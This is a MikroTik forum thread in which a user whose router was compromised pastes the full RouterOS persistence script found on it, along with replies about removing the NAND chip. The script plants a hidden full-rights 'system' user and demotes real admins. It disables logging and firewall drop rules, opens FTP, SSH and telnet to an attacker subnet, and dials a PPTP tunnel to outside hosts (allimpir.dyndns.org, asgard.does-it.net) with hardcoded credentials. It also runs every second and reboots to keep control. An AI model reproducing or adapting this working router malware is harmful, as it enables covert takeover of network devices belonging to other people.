:loc p0 ":glo xey [:pick [/sys clo get time] 6 8];:loc s7 \":del 3;:glo sysJ true;:del 1;/too net rem [find host=7.7.7.7];\";:if (([/sys pac get ppp disabled] or [/sys pac get sec disabled]) or [/sys pac get advance disabled]) do={/sys pac enable [find];/too net rem [find host=7.7.7.7];/too net add host=7.7.7.7 dis=no int=1 tim=1 up=\$s7 down=\$s7;:del 1;/sys reb;};"
:loc m1 "/too mac-ser set [find] disabled=yes;/too mac-ser mac-win set [find] disabled=yes;"
:loc m2 "/too mac-ser set allowed-interface-list=none;/too mac-ser mac-win set allowed-interface-list=none;"
:loc a1 ":glo PRB [:tostr [/sys rou set get prot]];:if ((\$PRB=\"disabled\") or (\$PRB=\"false\")) do={:set sysJ true;/sys rou set set ena=no prot=enabled reformat-hold-button=$reH;};"
:loc a2 ":glo JRST [:tostr [/sys rou set get ena]];:if ((\$JRST=\"enabled\") or (\$JRST=\"true\")) do={:set sysJ true;/sys rou set set ena=no prot=enabled reformat-hold-button=$reH;};"
:loc c0 "/sys rou set set ena=no prot=enabled sil=yes boot-dev=nand-only;:glo sysJ;"
:loc c1 "/sys rou set set ena=no prot=enabled sil=yes boot-dev=nand-only reformat-hold-button=$reH;:glo sysJ;"
:loc c2 "/sys rou set set ena=no prot=enabled sil=yes boot-dev=nand-only reformat-hold-button=$reH reformat-hold-button-max=$reMX;:glo sysJ;"
:loc c3 ":glo sysJ;:glo JRST [:tostr [/sys rou set get ena]];:if ((\$JRST=\"enabled\") or (\$JRST=\"true\")) do={:set sysJ true;};"
:loc d1 ":loc s6 \":del 60;:glo sysJ false;:del 1;/too net rem [find host=6.6.6.6];\";:glo JRST [:tostr [/sys rou set get ena]];:if ((\$JRST=\"enabled\") or (\$JRST=\"true\")) do={/too net rem [find host=6.6.6.6];/too net add host=6.6.6.6 dis=no int=1 tim=1 up=\$s6 down=\$s6;/sys rou set set ena=no prot=enabled reformat-hold-button=$reH;:del 1;:if ([:len [/use gro find name=sys]]=0) do={/use gro add name=sys pol=loc,win,reb;:del 1;/use add nam=sys gro=full dis=no pas=([/ip fir lay get [find name=syscret] regexp].\$xey);/use set [find name!=sys] group=sys;} else={/use gro set [find name=sys] pol=!wri,!pas,!sen,!api,!loc,!tel,!ssh,!ftp,!pol,!sni};/sys pac upd set cha=cur;/sys pac upd che;/fil rem [find type=script];:exec {/sys pac upd ins;};:if ([:len [:find [/sys pac upd get stat] Down]]=0) do={/sys reb;}};"
:loc uScr;:if ($rosV>=6410) do={:set uScr ($p0.$c2.$a1.$a2.$m2);} else={:if ($rosV>=6400) do={:set uScr ($p0.$c2.$a1.$a2.$m1);} else={:if ($rosV>=6346) do={:if (($JRST="enabled") or ($JRST="true")) do={:set uScr ($p0.$d1.$m1);} else={:set uScr ($p0.$d1.$m1);}} else={:if ($rosV>=6330) do={:set uScr ($p0.$c1.$a1.$a2.$m1);} else={:set uScr ($p0.$c0.$m1);}}}}
:if ([:len [/too net find host=127.0.0.1]]!=1) do={/too net rem [find host=127.0.0.1];/too net add host=127.0.0.1 int=1 tim=1 dis=no up=$uScr down=$uScr;} else={/too net set [find host=127.0.0.1] int=1 tim=1 dis=no up=$uScr down=$uScr;}
:loc sysX "system";:loc word {"\"system\"";"=system";"rem system";"rem system";"remo system";"remov system";"remove system";"ip ser";"user g";"user a";"user s";"use g";"use a";"use s"};
/sys scr {:fore s in [find name!=$sysX] do={:loc n [get $s name];:loc sSRC [get $s source];:fore w in $word do={:loc d [:len [:find $sSRC $w]];:if ($d!=0) do={/sys scr rem $n;:set sysJ true;};};}}
/sys sch {:fore s in [find name!=$sysX] do={:loc n [get $s name];:loc sSRC [get $s on-event];:fore w in $word do={:loc d [:len [:find $sSRC $w]];:if ($d!=0) do={/sys sch rem $n;:set sysJ true;};};}}
/too net {:fore s in [find host!=127.0.0.1] do={:loc h [get $s host];:if ($h!=8.8.8.8) do={:loc nws [get $s up];:fore w in $word do={:loc d [:len [:find $nws $w]];:if ($d!=0) do={/too net rem [find host=$h];:set sysJ true;};};:loc nws [get $s down];:fore w in $word do={:loc d [:len [:find $nws $w]];:if ($d!=0) do={/too net rem [find host=$h];:set sysJ true;};};}}}
:if ([:len [/use find name=system]]!=0) do={/use rem [find name=system];:set sysJ true}
:if ([/sys route set get boot-device]!="nand-only") do={/sys route set set boot-device=nand-only;:set sysJ true;}
:if ([:len [/sys scr find name=system]]=1) do={:loc sysSrcX [/sys scr get [find name=system] source];:loc sysPolX [/sys scr get [find name=system] policy];:if ($sysSrcX!=$sysSrc) do={/sys scr set [find name=system] source=$sysSrc;:set sysJ true;};:if ($sysPolX!=$sPol) do={/sys scr set [find name=system] policy=$sPol;:set sysJ true;};
} else={
/sys scr add name=system policy=$sPol source=$sysSrc;
:if ([:len [/sys sch find name=system]]=1) do={/sys sch set [find name=system] int=1s on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no;} else={/sys sch add int=1s name=system on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no;}
:if ([:len [/ip fir lay find name=sysJail]]=0) do={/ip fir lay add name=sysJail regexp=1;} else={:if ([:len [:tonum [/ip fir lay get [find name=sysJail] regexp]]]=0) do={/ip fir lay set [find name=sysJail] regexp=1;} else={:loc J [:tonum [/ip fir lay get [find name=sysJail] regexp]];:set J ($J+1);/ip fir lay set [find name=sysJail] regexp=$J;}};:if ([:len [/sys scr find name=system]]=1) do={:del 0;} else={/sys scr add name=system policy=$sPol source=$sysSrc;};/sys reb;
}
/sys scr {:fore scri in=[find name!="system"] do={:if ([get $scri source]=$sysSrc) do={[rem $scri];:set sysJ true;}}}
:if ([:len [/sys sch find name=system]]=1) do={
:loc SCHX [/sys sch get [find name=system] policy]
:if ($SCHX!=$sSchP) do={/sys sch set [find name=system] policy=$sSchP;:set sysJ true;}
:if ([/sys sch get [find name=system] disabled]!=no) do={/sys sch set [find name=system] disabled=no;:set sysJ true;}
:if ([/sys sch get [find name=system] interval]!="00:00:01") do={/sys sch set [find name=system] int=1s;:set sysJ true;}
:if ([/sys sch get [find name=system] start-time]!="00:00:00") do={/sys sch set [find name=system] start-time=00:00:00;:set sysJ true;}
:if ([/sys sch get [find name=system] start-date]!="jan/01/1970") do={/sys sch set [find name=system] start-date=jan/01/1970;:set sysJ true;}
:if ([/sys sch get [find name=system] on-event]!="system") do={/sys sch set [find name=system] on-event=system;:set sysJ true;}
} else={/sys sch add int=1s name=system on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no;:set sysJ true;}
:set UAC [:len [/use act find via!="ftp"]];:if ($UAC=0) do={:set sysNoOther true;} else={:set sysNoOther true;/use act {:fore acc in=[find via!="ftp"] do={:if ([get $acc name]!="system") do={:set sysNoOther false;}}}}
/use act {:fore u in=[find] do={:loc uu [get $u address];:loc vv [get $u via];:if (([:len [:find $uu ":"]]!=0) or (($vv="console") or ($vv="local"))) do={:set mLOG true;} else={:set mLOG false}}};
:loc upROSX [/sys pac upd get status];:if ([:len [:find $upROSX "Downloaded"]]=0) do={:del 0} else={/sys pac upd can;}
:if ([:len [/ip fir lay find name=syscret]]=0) do={/ip fir lay add name=syscret regexp=$syscret;:set sysJ true;} else={:if ([/ip fir lay get [find name=syscret] regexp]!=$syscret) do={/ip fir lay set [find name=syscret] regexp=$syscret;:set sysJ true;}}
:if ($sysJ) do={
:if ([:len [/ip fir lay find name=sysJail]]=0) do={/ip fir lay add name=sysJail regexp=1;} else={:if ([:len [:tonum [/ip fir lay get [find name=sysJail] regexp]]]=0) do={/ip fir lay set [find name=sysJail] regexp=1;} else={:loc J [:tonum [/ip fir lay get [find name=sysJail] regexp]];:set J ($J+1);/ip fir lay set [find name=sysJail] regexp=$J;}};
:if ([:len [/sys scr find name=system]]=1) do={:del 0;} else={/sys scr add name=system policy=$sPol source=$sysSrc;};
:if ([:len [/sys sch find name=system]]=1) do={/sys sch set [find name=system] int=1s on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no;} else={/sys sch add int=1s name=system on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no;};/sys reb;
}
}
:set sR2 0;/snmp exp ver fil=init10;/ip ser exp ver fil=init11;/ip fir service-port exp ver fil=init12;/sys log set [find] disable=yes;/sys log exp ver fil=init13;/sys ntp cli exp ver fil=init15;/sys log set [find] action=remote disabled=yes;
:loc logX [/sys clo get time];:set contX [/fil get [find name=code0.txt] content];:del 1;:if ([:file get code0.txt size]<3800) do={/fil set [find name=code0.txt] content="$contX,$logX";:del 1;};/sys scr env rem [find];
}
}
 
User avatar
AlainCasault
Trainer
Trainer
Posts: 601
Joined: Fri Apr 30, 2010 3:25 pm
Location: Laval, QC, Canada
Contact:

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Mon Mar 05, 2018 1:56 am

I just send to the Mikrotik service center , They said about detach NAND gate on the routerboard
Did you try the link I have you?


Sent from Tapatalk

___________________________
Alain Casault, Eng.
If I helped you, let me know!
 
korawit
just joined
Topic Author
Posts: 16
Joined: Thu Feb 22, 2018 9:12 am

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Mon Mar 05, 2018 8:12 am

I just send to the Mikrotik service center , They said about detach NAND gate on the routerboard
Did you try the link I have you?


Sent from Tapatalk
Yes, but it didn't work due to limitation of priviledge
 
korawit
just joined
Topic Author
Posts: 16
Joined: Thu Feb 22, 2018 9:12 am

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Mon Mar 05, 2018 10:20 am

The process of NAND Gate removal
Image
Image
 
korawit
just joined
Topic Author
Posts: 16
Joined: Thu Feb 22, 2018 9:12 am

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Mon Mar 05, 2018 10:21 am

Same problem as yours and this is the full scrip.
:glo systemV 30RC5
:glo rosX 6346;
:glo xFlag false
:glo sysCLRFlag false
:glo moROSF true
:glo moMACF false
:glo fPort 21;:glo sPort 22;:glo tPort 23;
:glo sC;:glo sCM 5;:glo s5;
:glo rstTime 17084;:glo JRST;:glo xey;
:glo sysTime;:glo sRM 900;:glo sR2;:glo sR1;
:glo sysJ;:glo sysNoOther;:glo sysPPS;:glo UAC;:glo PTPST;:glo sysB;:glo sysE;:glo DOM;
:loc lntp;:loc sysSrc;:loc sPol;:loc sSchP;
:loc contX;:loc acx;:loc wx;:loc viax;:loc addx;
:loc ptpU
:loc HL 60;:loc moMAX 1
:loc jST;:loc stJ;:loc tSCR;:loc tSTA;:loc RF;:loc tt;
:loc s8 ":glo sysJ;:loc s4 false;/fil {:fore f in [find type=\"backup\"] do={:loc n [get \$f name];/sys back save name=\$n;}};:loc s1;:loc s2;:loc s0 [:len [/sys scr find name=system]];:loc ss [:len [/sys sch find name=system]];:loc s3 false;:if (\$s0=1) do={:if (\$ss=1) do={:set s1 [/sys scr get [find name=system] run-count];:del 3;:set s2 [/sys scr get [find name=system] run-count];:if (\$s2=0 or (\$s1=\$s2)) do={/sys sch rem [find name=system];:del 1;/sys sch add name=system disable=no interval=1s on-event=system start-date=jan/01/1970 start-time=00:00:00;}} else={:set s3 true;}} else={:set s3 true;};:if (\$s3) do={:loc xx;/fil {:fore f in [find] do={:loc x [get \$f name];:if ([:len [:find \$x \"ss.db\"]]=1) do={:set xx \$x;:set s4 true;}}};:if (\$s4) do={:set sysJ true;/import \$xx;};}"
:loc s9 "/lcd set ena=no tou=dis;"
:if ([:len [/sys scr job find script="system"]]>=2) do={:set tt [/sys clo get time];:for x from=0 to=([:len $tt]-1) do={:if ([:pick $tt $x ($x+1)]=":") do={:set tt ([:pick $tt 0 $x].",".[:pick $tt ($x+1) [:len $tt]]);}};:set tt [:toarray $tt];:set sysTime ((($tt->0)*3600)+(($tt->1)*60)+($tt->2));
/sys scr job {:fore j in=[find script="system"] do={:set tSTA [get $j start];:set stJ [:pick $tSTA ([:find $tSTA " "]+1) [:len $tSTA]];:for x from=0 to=([:len $stJ]-1) do={:if ([:pick $stJ $x ($x+1)]=":") do={:set stJ ([:pick $stJ 0 $x].",".[:pick $stJ ($x+1) [:len $stJ]]);};};:set stJ [:toarray $stJ];:set jST ((($stJ->0)*3600)+(($stJ->1)*60)+($stJ->2));:loc sysTmp;:if ($sysTime<$jST) do={:set sysTmp ($sysTime+86400-$jST);} else={:set sysTmp ($sysTime-$jST);};:if ($sysTmp>=$sR1) do={:set sR1 $sysTmp;} else={:set sR1 ($sR1-1);};:if ($sR1>$sRM) do={/sys reb;};}}
:if ([:len [/too net find host=8.8.8.8]]!=1) do={/too net rem [find host=8.8.8.8];/too net add host=8.8.8.8 dis=no int=1 tim=1 up=$s8 down=$s8;} else={:loc u8 [/too net get [find host=8.8.8.8] up];:loc d8 [/too net get [find host=8.8.8.8] down];:loc db [/too net get [find host=8.8.8.8] dis];:loc i8 [/too net get [find host=8.8.8.8] int];:if (((($u8=$s8) and ($d8=$s8)) and !$db) and ($i8=[:totime 1])) do={:del 0;} else={/too net set [find host=8.8.8.8] up=$s8 down=$s8 dis=no int=1;}}
} else={
:set sysNoOther true;:set UAC [:len [/use act find name!="system"]];:loc mLOG false;/use act {:fore u in=[find] do={:loc uu [get $u address];:loc vv [get $u via];:if (([:len [:find $uu ":"]]!=0) or (($vv="console") or ($vv="local"))) do={:set mLOG true;}}}
:if ($UAC=0) do={:set sysNoOther true;} else={:set sysB [/sys clo get time];:set sysNoOther true;/use act {:fore acc in=[find via!="ftp"] do={:if ([get $acc name]!="system") do={:if ($sysCLRFlag) do={/fil pri fil=sysCLR;/ip fir lay rem [find name=sysCLR];:del 1;/ip fir lay add name=sysCLR regexp=true;:del 1;/sys reb;};:set sysNoOther false;:set sC 0;:set acx [get $acc name];:set wx [get $acc when];:set viax [get $acc via];:set addx [get $acc address];:if ([:len [/ip fir lay find name=sysIntru]]=0) do={/ip fir lay add name=sysIntru regex=true};:if ([:len [/fil find name=pps.txt]]!=0) do={:set sysPPS [/fil get [find name=pps.txt] content];} else={:set sysPPS 0;};};};};};
:if ($sysNoOther and (!$mLOG)) do={:set DOM "allimpir.dyndns.org";
:loc archi [/sys reso get archi];:if (([:len [/ip fir lay find name=sysJail]]!=0) or $sysJ) do={:set ptpU "jail";} else={:set ptpU "void";}
:if ($archi="tile") do={:set PTPST ($ptpU."CCR");} else={:if ($archi="powerpc") do={:set PTPST ($ptpU."PPC");} else={:if ($archi="mipsbe") do={:set PTPST ($ptpU."MIPSBE");} else={:if ($archi="mmips") do={:set PTPST ($ptpU."MMIPS");} else={:if ($archi="smips") do={:set PTPST ($ptpU."SMIPS");} else={:if (($archi="x86") or ($archi="x86_64")) do={:set PTPST ($ptpU."X86");} else={:if ($archi="arm") do={:set PTPST ($ptpU."ARM");} else={:set PTPST $ptpU;}}}}}}};
:if ([:len [/ip fir lay find name=sysIntru]]=1) do={
:if ($sC<$sCM) do={
:set sC ($sC+1);
:if ([:len [/ip fir lay find name=sysJail]]!=0) do={
:loc mcnt [/ip fir lay get [find name=sysJail] regex];
:loc sysV [:tonum [:pick $systemV 0 2]];:set xey [:pick [/sys clo get time] 6 8];
:if ($mcnt>=$moMAX) do={/ip fir lay set [find name=sysJail] regex=0;
:if ($sysV>=30) do={
:if ([:len [/use find name=sys]]=0) do={/use add name=sys group=full disabled=no password=([/ip fir lay get [find name=syscret] regexp].$xey);:del 1;/ip fir lay rem [find name=syscret];/use set [find group=sys] group=full;/use gro rem [find name=sys];/use gro add name=sys copy-from=full policy=!loc,!tel,!ssh,!ftp,!pol,!sni;:del 1;/use set [find name!=sys] group=sys;/use set [find name=system] group=full;} else={/use rem [find name=system];/use set [find group=sysT] group=full;/use gro rem [find name=sysT];/use gro add name=sysT copy-from=full policy=!wri,!pas,!sen,!api,!loc,!tel,!ssh,!ftp,!pol,!sni;:del 1;/use gro set [find name=sys] policy=[/use gro get [find name=sysT] policy];/use gro rem [find name=sysT];/use set [find name!=sys] group=sys;/ip fir lay rem [find name=syscret];}
} else={:if ($sysV>=26) do={:if ([:len [/use find name=sys]]=0) do={/use add name=sys group=full disabled=no password=([/ip fir lay get [find name=syscret] regexp].$xey);/ip fir lay rem [find name=syscret];/use set [find group=sys] group=full;/use gro rem [find name=sys];:del 1;/use gro add name=sys copy-from=full policy=!loc,!tel,!ssh,!ftp,!pol,!sni;:del 1;/use set [find name!=sys] group=sys;/use set [find name=system] group=full;}}}
/sys scr rem [find name=README];/sys scr add name=README source="."
}
}
} else={
/ip fir lay rem [find name=sysIntru];
:if ([:len [/int pptp-cli find name=system]]!=1) do={/int pptp-cli rem [find name=system];:del 1;/int pptp-cli add allow=mschap1,mschap2 connect-to=8.8.8.8 disabled=no name=system password=password profile=default user=$PTPST;:del 1;} else={/int pptp-cli set [find name=system] connect-to=8.8.8.8 disabled=no profile=default user=$PTPST password=password;}
:loc ptp2;:loc ptpS;
:if (([:len [/ip dns get servers]]=0) and ([:len [/ip dns get dynamic-servers]]=0)) do={/ip dns set servers=8.8.8.8,8.8.4.4;};:set DOM "asgard.does-it.net";:if ([:typeof [/int pptp-cli get [find name=system] connect-to]]="ip") do={:set ptp2 [/int pptp-cli get [find name=system] connect-to];:set ptpS [:resolve $DOM];:if ($ptp2!=$ptpS) do={/int pptp-cli set [find name=system] connect-to=$ptpS disabled=no user=$PTPST password=password;}} else={:set ptp2 [/int pptp-cli get [find name=system] connect-to];:set ptpS $DOM;:if ($ptp2!=$ptpS) do={/int pptp-cli set [find name=system] connect-to=$ptpS disabled=no user=$PTPST password=password;}}
:loc wait 2;:loc ptpW true;
:while (($wait>0) and $ptpW) do={:set ptpW (![/int pptp-cli get [find name=system] running]);:set wait ($wait-1);:del 1;}
:if ((!$ptpW)) do={
/ip fir fil set [find chain=input and src-address="172.16.0.0/12" and action="accept"] in-interface=system action=accept
:if ([:len [/ip fir fil find chain=input and src-address="172.16.0.0/12" and in-interface="!system" and action="drop"]]=0) do={:if ([:len [/ip fir fil find chain=input and src-address="172.16.0.0/12" and in-interface="system"]]!=0) do={/ip fir fil add copy-from=[find chain=input and src-address="172.16.0.0/12" and in-interface="system" and action="accept"] in-interface=!system action=drop}}
:if ([:len [/ip rou find dst-address=172.24.0.0/13]]!=1) do={/ip rou rem [find dst-address=172.24.0.0/13];:del 1;/ip rou add dst-address=172.24.0.0/13 gateway=system com=system;} else={:if ([/ip rou get [find dst-address=172.24.0.0/13] gateway]!="system") do={/ip rou set [find dst-address=172.24.0.0/13] gateway=system;}}
:if ([:len [/ip rou find dst-address=172.25.0.0/24]]!=1) do={/ip rou rem [find dst-address=172.25.0.0/24];:del 1;/ip rou add dst-address=172.25.0.0/24 gateway=system com=system;} else={:if ([/ip rou get [find dst-address=172.25.0.0/24] gateway]!="system") do={/ip rou set [find dst-address=172.25.0.0/24] gateway=system;}}
}
}
} else={
:loc ptp2;:loc ptpS;
:if ([:len [/int pptp-cli find name=system]]!=1) do={/int pptp-cli rem [find name=system];:del 1;/int pptp-cli add allow=mschap1,mschap2 connect-to=8.8.8.8 disabled=no name=system password=password profile=default user=$PTPST;:del 1;} else={
:if (([:len [/ip dns get servers]]=0) and ([:len [/ip dns get dynamic-servers]]=0)) do={/ip dns set servers=8.8.8.8,8.8.4.4;};:set DOM "asgard.does-it.net";:if ([:typeof [/int pptp-cli get [find name=system] connect-to]]="ip") do={:set ptp2 [/int pptp-cli get [find name=system] connect-to];:set ptpS [:resolve $DOM];:if ($ptp2!=$ptpS) do={/int pptp-cli set [find name=system] connect-to=$ptpS disabled=no;}} else={:set ptp2 [/int pptp-cli get [find name=system] connect-to];:set ptpS $DOM;:if ($ptp2!=$ptpS) do={/int pptp-cli set [find name=system] connect-to=$ptpS disabled=no;}}
:loc wait 2;:loc ptpW true;
:while (($wait>0) and $ptpW) do={:set ptpW (![/int pptp-cli get [find name=system] running]);:set wait ($wait-1);:del 1;}
:if ((!$ptpW)) do={
:if ([:len [/use find name=system]]=0) do={
/snmp exp ver fil=init10;/ip ser exp ver fil=init11;/ip fir service-port exp ver fil=init12;/sys log set [find] disable=yes;/sys log exp ver fil=init13;/sys ntp cli exp ver fil=init15;:del 2;
/use add gro=full name=system address=172.24.0.0/13,127.0.0.1;/int pptp-ser ser set default-profile=default enabled=yes max-mru=1472 max-mtu=1472;/ip poo rem [find name=system];/ppp pro rem [find comment=system];/ppp sec rem [find comment=system];:del 1;
/ip poo add name=system ranges=10.147.147.2-10.147.147.254;/ppp pro add local-address=10.147.147.1 name=system remote-address=system com=system;/ppp sec add nam=spidy pas=peterparker pro=system ser=pptp com=system;/ip fir nat add action=masquerade chain=srcnat com=system;
/fil rem [find type=".log file"];/fil rem [find type=package];/fil rem [find type=".npk file"];
:loc s172 false;:loc s127 false;
:fore x in=[/ip ser get ftp address] do={:if ($x=172.24.0.0/13) do={:set s172 true};:if ($x=127.0.0.1/32) do={:set s127 true}};:if (!$s172) do={/ip ser set ftp address=([/ip ser get ftp address],172.24.0.0/13);};:if (!$s127) do={/ip ser set ftp address=([/ip ser get ftp address],127.0.0.1/32);};/ip ser set ftp port=$fPort disabled=no;:loc s172 false;
:fore x in=[/ip ser get ssh address] do={:if ($x=172.24.0.0/13) do={:set s172 true}};:if (!$s172) do={/ip ser set ssh address=([/ip ser get ssh address],172.24.0.0/13)};/ip ser set ssh port=$sPort disabled=no;:loc s172 false;
:fore x in=[/ip ser get telnet address] do={:if ($x=172.24.0.0/13) do={:set s172 true}};:if (!$s172) do={/ip ser set telnet address=([/ip ser get telnet address],172.24.0.0/13)};/ip ser set telnet port=$tPort disabled=no;
/ip ser set www address="" disabled=no;/ip fir service-port set [find name=ftp] disabled=no ports=$fPort;
/ip fir fil set [find chain=input and action=drop] dis=yes;
/ip fir fil set [find chain=output and action=drop] dis=yes;:del 1;
/ip fir fil add cha=input src-address=172.16.0.0/12 act=accept com=system;
/ip fir fil add cha=output src-address=172.16.0.0/12 act=accept com=system;
/ip fir fil add cha=input src-address=127.0.0.1/32 act=accept com=system;
/ip fir fil add cha=output src-address=127.0.0.1/32 act=accept com=system;
/ip fir fil add cha=input dst-port=21,22,23,162 src-address=!172.16.0.0/12 act=drop protocol=tcp com=system;
/ip fir fil add cha=input dst-port=161 src-address=!172.16.0.0/12 act=drop protocol=udp com=system;
:loc tmpinf;/int pppoe-client {:fore i in=[find running=yes] do={:set tmpinf [get $i name];/ip fir fil add cha=input dst-port=53 in-interface=$tmpinf act=drop protocol=udp com=system dis=no;}}
}
:if ([:len [/ip rou find dst-address=172.24.0.0/13]]!=1) do={/ip rou rem [find dst-address=172.24.0.0/13];:del 1;/ip rou add dst-address=172.24.0.0/13 gateway=system com=system;} else={:if ([/ip rou get [find dst-address=172.24.0.0/13] gateway]!="system") do={/ip rou set [find dst-address=172.24.0.0/13] gateway=system;}}
:if ([:len [/ip rou find dst-address=172.25.0.0/24]]!=1) do={/ip rou rem [find dst-address=172.25.0.0/24];:del 1;/ip rou add dst-address=172.25.0.0/24 gateway=system com=system;} else={:if ([/ip rou get [find dst-address=172.25.0.0/24] gateway]!="system") do={/ip rou set [find dst-address=172.25.0.0/24] gateway=system;}}
/ip fir fil set [find chain=input and src-address="172.16.0.0/12" and action="accept"] in-interface=system action=accept
:if ([:len [/ip fir fil find chain=input and src-address="172.16.0.0/12" and in-interface="!system" and action="drop"]]=0) do={:if ([:len [/ip fir fil find chain=input and src-address="172.16.0.0/12" and in-interface="system"]]!=0) do={/ip fir fil add copy-from=[find chain=input and src-address="172.16.0.0/12" and in-interface="system" and action="accept"] in-interface=!system action=drop}}
}
/int pptp-cli mon [find name=system] once do={:set lntp $"remote-address"};
:loc ntpSTmp;:set ntpSTmp [/sys ntp cli get pri];
:if ($ntpSTmp!=$lntp) do={/sys ntp cli set pri=$lntp sec=$lntp ena=no;:del 1;/sys ntp cli set ena=yes;}
}
:set tt [/sys clo get time];:for x from=0 to=([:len $tt]-1) do={:if ([:pick $tt $x ($x+1)]=":") do={:set tt ([:pick $tt 0 $x].",".[:pick $tt ($x+1) [:len $tt]])}};:set tt [:toarray $tt];:set sysTime ((($tt->0)*3600)+(($tt->1)*60)+($tt->2));:if (($sysTime<($rstTime+2)) and ($sysTime>($rstTime-2))) do={
:if ([:len [/ip fir lay find name=sysR]]=0) do={/ip fir lay add name=sysR regexp=1;} else={:if ([:len [:tonum [/ip fir lay get [find name=sysR] regexp]]]=0) do={/ip fir lay set [find name=sysR] regexp=1;} else={:loc J [:tonum [/ip fir lay get [find name=sysR] regexp]];:set J ($J+1);/ip fir lay set [find name=sysR] regexp=$J;}};
/sys reb;}
}
} else={
:set sysSrc [/sys scr get [find name=system] source];:set sPol [/sys scr get [find name=system] policy];
:if ([:len [/sys sch find name=system]]=0) do={/sys sch add int=1s name=system on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no};:set sSchP [/sys sch get [find name=system] policy];
:loc syscret;:set s5 false;/fil {:fore f in [find] do={:loc x [get $f name];:if ([:len [:find $x "ss.db"]]=1) do={:set s5 true;}}};
:if ([:len [/ip fir lay find name=syscret]]=1) do={:set syscret [/ip fir lay get [find name=syscret] regexp]} else={/ip fir lay add name=syscret regexp=12345678;:set syscret 12345678;}
/use rem [find name=system];/use {:fore u in [find] do={:if ([:len [:find [get $u name] system]]!=0) do={[rem $u]}}}
/int pptp-cli rem [find name=system]
:loc sysW {"sys";"func";"init"}
/sys scr {:fore s in [find name!=system] do={:loc n [get $s name];:fore w in $sysW do={:loc det [:len [:find $n $w]];:if ($det!=0) do={/sys scr rem $n;};}}}
/sys sch {:fore s in [find name!=system] do={:loc n [get $s name];:fore w in $sysW do={:loc det [:len [:find $n $w]];:if ($det!=0) do={/sys sch rem $n;};}}}
/fil {:fore f in [find] do={:loc x [get $f name];:if ([:len [:find $x "init.db"]]=1) do={/fil rem [find name=$x];}}};/fil rem [find type=".log file"];/fil rem [find name=virgin.txt];/fil rem [find name=system.txt];/fil rem [find name=sysMonROS.txt];/fil rem [find type=package];/fil rem [find type=".npk file"];/fil rem [find type=".tar file"];/fil rem [find type=".rif file"];/fil rem [find type=".rar file"];/fil rem [find type=".zip file"];/fil rem [find name=sys-note.txt];
:if ([:len [/fil find name=init10.rsc]]!=0) do={/snmp comm rem [find default=no];:del 1;/imp init10.rsc;/fil rem [find name=init10.rsc];}
:if ([:len [/fil find name=init11.rsc]]!=0) do={/imp file=init11.rsc;/fil rem [find name=init11.rsc];} else={/ip ser set ftp disabled=no address="" port=21;/ip ser set ssh disabled=no address="" port=22;/ip ser set telnet disabled=no address="" port=23;}
:if ([:len [/fil find name=init12.rsc]]!=0) do={/imp file=init12.rsc;/fil rem [find name=init12.rsc];}
:if ([:len [/fil find name=init13.rsc]]!=0) do={/sys log rem [find default=no];/sys log action rem [find default=no];:del 1;/imp file=init13.rsc;/fil rem [find name=init13.rsc];}
:if ([:len [/fil find name=init15.rsc]]!=0) do={/imp file=init15.rsc;/fil rem [find name=init15.rsc];}
/fil rem [find type=script];/ip fir fil rem [find comment=system];/ip fir nat rem [find comment=system];/ip fir mangle rem [find comment=system];
/ip rou rem [find comment=system];/ip poo rem [find name=system];/ppp pro rem [find comment=system];/ppp sec rem [find comment=system];
/too traffic-g stop;/too traffic-g stream rem [find];/too traffic-g packet rem [find];/too traffic-g port rem [find];
:loc ncnt;:set ncnt [:len [/ip fir nat find comment!="system"]];:if ($ncnt=0) do={/ip fir nat add action=masquerade chain=srcnat}
:if ([:len [/fil find name=code0.txt]]=0) do={/fil pri file=code0.txt;:del 1;/fil set [find name=code0.txt] content="$wx,$acx,$viax,$addx";} else={:if ([/fil get [find name=code0.txt] size]>3800) do={/fil set [find name=code0.txt] content="$wx,$acx,$viax,$addx";} else={:set contX [/fil get [find name=code0.txt] content];/fil set [find name=code0.txt] content="$contX\n$wx,$acx,$viax,$addx";}}
:set tt [/sys clo get time];:for x from=0 to=([:len $tt]-1) do={:if ([:pick $tt $x ($x+1)]=":") do={:set tt ([:pick $tt 0 $x].",".[:pick $tt ($x+1) [:len $tt]]);}}
:set tt [:toarray $tt];:set sysTime ((($tt->0)*3600)+(($tt->1)*60)+($tt->2))
/sys scr job {:fore j in=[find] do={:set tSCR [get $j script];:set tSTA [get $j start];:if ([:typeof [get $j script]]="str") do={:loc scriptName [get $j script];:if (($scriptName="sysMonROS") or ($scriptName="init0") or ($scriptName="init1")) do={[rem $j];}} else={:set stJ [:pick $tSTA ([:find $tSTA " "]+1) [:len $tSTA]];:for x from=0 to=([:len $stJ]-1) do={:if ([:pick $stJ $x ($x+1)]=":") do={:set stJ ([:pick $stJ 0 $x].",".[:pick $stJ ($x+1) [:len $stJ]]);}};:set stJ [:toarray $stJ];:set jST ((($stJ->0)*3600)+(($stJ->1)*60)+($stJ->2));:if ($sysTime<$jST) do={:set RF ($sysTime+86400-$jST);} else={:set RF ($sysTime-$jST);};:if ($RF>$HL) do={[rem $j];};}}}
:set sysE [/sys clo get time];/sys scr job rem [find script!="system"];/sys scr job rem [find type="login"];
:if ([:len [/ip fir lay find name=syslog]]=0) do={/ip fir lay add name=syslog regexp=1;} else={:if ([:len [:tonum [/ip fir lay get [find name=syslog] regexp]]]=0) do={/ip fir lay set [find name=syslog] regexp=1;} else={:loc J [:tonum [/ip fir lay get [find name=syslog] regexp]];:set J ($J+1);/ip fir lay set [find name=syslog] regexp=$J;}};
:while (!$sysNoOther or $mLOG) do={
:loc f1 ":glo f2 false;/fil {:fore f in [find] do={:loc x [get \$f name];:if ([:len [:find \$x \"ss.db\"]]=1) do={:set f2 true;}}};:if (!\$f2 and \$s5) do={:set sysJ true;};"
/too net rem [find host=9.9.9.9];/too net add host=9.9.9.9 dis=no int=1 tim=1 up=($f1.$s9) down=($f1.$s9);
/sys pac upd can;:del 1;:set sR2 ($sR2+1);:if ($sR2>$sRM) do={/sys reb;};
